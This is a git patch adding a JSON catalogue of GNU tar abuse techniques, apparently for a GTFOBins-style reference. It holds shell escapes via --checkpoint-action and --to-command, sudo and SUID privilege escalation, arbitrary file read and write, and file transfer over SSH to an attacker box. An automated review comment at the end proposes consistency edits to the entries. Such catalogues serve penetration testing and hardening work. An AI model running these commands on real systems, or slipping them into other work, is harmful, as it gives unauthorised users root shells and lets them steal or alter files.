From 3bf918057f23e383f86fec0afb83c0f3df3f5aae Mon Sep 17 00:00:00 2001
From: t0thkr1s
Date: Fri, 10 Jan 2020 13:13:45 +0100
Subject: [PATCH] add data for tar
---
data/tar.json | 51 +++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 51 insertions(+)
create mode 100644 data/tar.json
diff --git a/data/tar.json b/data/tar.json
new file mode 100644
index 0000000..0914359
--- /dev/null
+++ b/data/tar.json
@@ -0,0 +1,51 @@
+{
+ "functions": {
+ "shell": [
+ {
+ "code": "tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
+ },
+ {
+ "description": "This only works for GNU tar.",
+ "code": "tar xf /dev/null -I '/bin/sh -c \"sh <&2 1>&2\"'"
+ },
+ {
+ "description": "This only works for GNU tar. It can be useful when only a limited command argument injection is available.",
+ "code": "TF=$(mktemp)\necho '/bin/sh 0<&1' > \"$TF\"\ntar cf \"$TF.tar\" \"$TF\"\ntar xf \"$TF.tar\" --to-command sh\nrm \"$TF\"*\n"
+ }
+ ],
+ "file-upload": [
+ {
+ "description": "This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the 'rmt' utility installed (it should be present by default in Debian-like distributions).",
+ "code": "tar cvf [user@host]:[destination_file] [source_file] --rsh-command=/bin/ssh\n"
+ }
+ ],
+ "file-download": [
+ {
+ "description": "This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the 'rmt' utility installed (it should be present by default in Debian-like distributions).",
+ "code": "tar xvf [user@host]:[file] --rsh-command=/bin/ssh\n"
+ }
+ ],
+ "file-write": [
+ {
+ "description": "This only works for GNU tar.",
+ "code": "TF=$(mktemp)\necho DATA > \"$TF\"\ntar c --xform \"s@.*@[file]@\" -OP \"$TF\" | tar x -P\n"
+ }
+ ],
+ "file-read": [
+ {
+ "description": "This only works for GNU tar.",
+ "code": "tar xf [file] -I '/bin/sh -c \"cat 1>&2\"'\n"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
+ }
+ ],
+ "limited-suid": [
+ {
+ "code": "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
+ }
+ ]
+ }
+}
\ No newline at end of file
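Review bot: The first `shell` entry and the `sudo` and `limited-suid` entries have no `description`, yet all three depend on `--checkpoint`/`--checkpoint-action`, which are GNU tar options just like the `-I` and `--to-command` used by the entries that are already marked. Adding `"description": "This only works for GNU tar."` to those three objects keeps the file consistent and tells a reader assessing a bsdtar or BusyBox host that the entry does not apply there. The `file-write` snippet also leaves its `mktemp` file on disk while the third `shell` snippet removes its own, so the two differ in the residue they leave behind; the description is the place to say so. The file is committed without a trailing newline (`\ No newline at end of file`), which is worth fixing for files kept in version control.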